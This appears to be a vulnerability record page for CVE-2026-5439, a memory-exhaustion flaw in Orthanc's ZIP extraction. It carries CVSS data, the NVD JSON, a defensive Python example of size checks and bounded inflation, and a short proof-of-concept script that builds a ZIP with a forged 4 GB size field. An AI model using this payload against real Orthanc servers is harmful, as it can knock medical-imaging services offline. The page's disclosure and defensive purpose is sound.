Security Vulnerability Report
CVE-2026-5439 CVSS 7.5 HIGH

CVE-2026-5439

Published: 2026-04-09 15:16:15
Last Modified: 2026-04-15 19:32:22

Description

A memory exhaustion vulnerability exists in ZIP archive processing. Orthanc automatically extracts ZIP archives uploaded to certain endpoints and trusts metadata fields describing the uncompressed size of archived files. An attacker can craft a small ZIP archive containing a forged size value, causing the server to allocate extremely large buffers during extraction.
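The defensive counterpart to the flaw described above, as an added example (this is illustration code, not Orthanc's own implementation or any published fix): the two checks a ZIP-accepting endpoint needs are a gate on the *declared* uncompressed sizes before any buffer is allocated, and a decompression loop whose output growth is bounded per step and capped by a byte budget, so neither a forged size field nor a genuinely expansive stream can drive an unbounded allocation (CWE-770). The limit constants, the `ArchiveLimitExceeded` exception and the fixture helpers `build_archive`, `forge_declared_size` and `raw_deflate` are assumptions made for this example; the forged fixture only rewrites a size field in an archive built by the standard library, to show the gate rejecting it.

```python
"""Defensive handling of untrusted ZIP uploads (added example, not Orthanc code):
never size a buffer from the archive's own metadata, and never inflate without
a byte budget. The limits below are constructed for this example; tune them."""
import io
import struct
import zipfile
import zlib

MAX_ENTRY_BYTES = 64 * 1024 * 1024    # largest single entry we are willing to inflate
MAX_TOTAL_BYTES = 256 * 1024 * 1024   # budget for one archive's total output
CHUNK = 64 * 1024                     # output growth per decompress() call


class ArchiveLimitExceeded(ValueError):
    """Raised when an archive's declared or actual size breaks policy."""


def check_declared_sizes(archive: bytes) -> int:
    """Reject on the central directory's *declared* sizes before anything is
    allocated. Returns the total declared uncompressed size when within policy.
    This is the cheap gate a forged 4 GiB size field should never get past."""
    total = 0
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        for info in zf.infolist():
            if info.file_size > MAX_ENTRY_BYTES:
                raise ArchiveLimitExceeded(
                    f"{info.filename!r} declares {info.file_size} bytes "
                    f"(limit {MAX_ENTRY_BYTES})")
            total += info.file_size
            if total > MAX_TOTAL_BYTES:
                raise ArchiveLimitExceeded("declared total exceeds archive budget")
    return total


def bounded_inflate(raw_deflate_stream: bytes, limit: int) -> bytes:
    """Inflate a raw DEFLATE stream (the encoding of method-8 ZIP entries) while
    growing the output by at most CHUNK per step. The declared size is never used
    to size the buffer, so a lying header cannot force a large allocation, and a
    stream that really does expand past `limit` is aborted at the budget."""
    d = zlib.decompressobj(wbits=-15)        # -15 selects raw DEFLATE (no zlib header)
    out = bytearray()
    pending = raw_deflate_stream
    while not d.eof:
        piece = d.decompress(pending, CHUNK)  # max_length caps this call's output
        if not piece and not d.unconsumed_tail:
            break                             # input exhausted without a stream end
        out += piece
        if len(out) > limit:
            raise ArchiveLimitExceeded(f"inflated output exceeded {limit} bytes")
        pending = d.unconsumed_tail           # input zlib could not yet consume
    return bytes(out)


# --- constructed fixtures used to demonstrate the checks (not real uploads) ---

def raw_deflate(payload: bytes) -> bytes:
    """Raw DEFLATE encoding of payload (what follows a ZIP local file header)."""
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    return c.compress(payload) + c.flush()


def build_archive(entries: dict) -> bytes:
    """Honest archive produced by the standard library."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


def forge_declared_size(archive: bytes, declared: int) -> bytes:
    """Test fixture: overwrite the uncompressed-size field of the last central
    directory record so the metadata lies, as the CVE description says."""
    cd = archive.rindex(b"PK\x01\x02")
    # central directory header: uncompressed size is the 4-byte LE field at offset 24
    return archive[:cd + 24] + struct.pack("<I", declared) + archive[cd + 28:]


if __name__ == "__main__":
    honest = build_archive({"report.txt": b"hello"})
    print("honest archive declares", check_declared_sizes(honest), "bytes")
    forged = forge_declared_size(honest, 0xFFFF_FFF0)       # ~4 GiB claimed, 5 real
    try:
        check_declared_sizes(forged)
    except ArchiveLimitExceeded as e:
        print("rejected:", e)
    expansive = raw_deflate(b"\0" * (4 * 1024 * 1024))     # a few KiB in, 4 MiB out
    try:
        bounded_inflate(expansive, limit=1024 * 1024)
    except ArchiveLimitExceeded as e:
        print("rejected:", e)
```

The two checks are complementary: the declared-size gate is cheap and stops the forged-header case before a single byte is inflated, while the bounded loop is what protects you when the metadata is plausible but wrong in the other direction. Note that Python's own `zipfile` truncates an entry's output at the declared `file_size`, which is why the streaming budget is shown on a raw DEFLATE stream rather than through `ZipFile.open`.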

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:orthanc-server:orthanc:*:*:*:*:*:*:*:* - VULNERABLE
Orthanc, versions before 1.12.11 (versionEndExcluding in the NVD record below; consult the official security advisory for the exact affected versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import struct


def create_malicious_zip(filename, fake_size=0xFFFFFFFF):
    # ZIP local file header signature
    signature = b'\x50\x4b\x03\x04'
    version = b'\x14\x00'
    flags = b'\x00\x00'
    compression = b'\x08\x00'  # Deflate
    mod_time = b'\x00\x00'
    mod_date = b'\x00\x00'
    crc32 = b'\x00\x00\x00\x00'
    entry_name = b'evil.txt'   # archived entry name (no longer shadows the output filename)
    # Body as in the original PoC: a zlib-wrapped empty deflate block (8 bytes)
    body = b'\x78\x9c\x03\x00\x00\x00\x00\x01'
    compressed_size = struct.pack('<I', len(body))    # must match the body actually written
    uncompressed_size = struct.pack('<I', fake_size)  # forged: far larger than the real content
    name_len = struct.pack('<H', len(entry_name))
    extra_len = struct.pack('<H', 0)
    header = (signature + version + flags + compression + mod_time + mod_date
              + crc32 + compressed_size + uncompressed_size + name_len
              + extra_len + entry_name)
    with open(filename, 'wb') as f:
        f.write(header)
        f.write(body)


create_malicious_zip('evil.zip', fake_size=0xFFFFFFFF)  # Claim 4GB size
```

References

https://kb.cert.org/vuls/id/536588 (Third Party Advisory, VDB Entry)
https://www.machinespirits.de/ (Not Applicable)
https://www.orthanc-server.com/ (Product)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-5439",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-09T15:16:15.443",
    "lastModified": "2026-04-15T19:32:22.333",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A memory exhaustion vulnerability exists in ZIP archive processing. Orthanc automatically extracts ZIP archives uploaded to certain endpoints and trusts metadata fields describing the uncompressed size of archived files. An attacker can craft a small ZIP archive containing a forged size value, causing the server to allocate extremely large buffers during extraction."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-770"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:orthanc-server:orthanc:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "1.12.11",
                "matchCriteriaId": "A259075D-8B77-4B04-BC42-3E5ABE9DFE1F"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://kb.cert.org/vuls/id/536588",
        "source": "[email protected]",
        "tags": ["Third Party Advisory", "VDB Entry"]
      },
      {
        "url": "https://www.machinespirits.de/",
        "source": "[email protected]",
        "tags": ["Not Applicable"]
      },
      {
        "url": "https://www.orthanc-server.com/",
        "source": "[email protected]",
        "tags": ["Product"]
      }
    ]
  }
}
```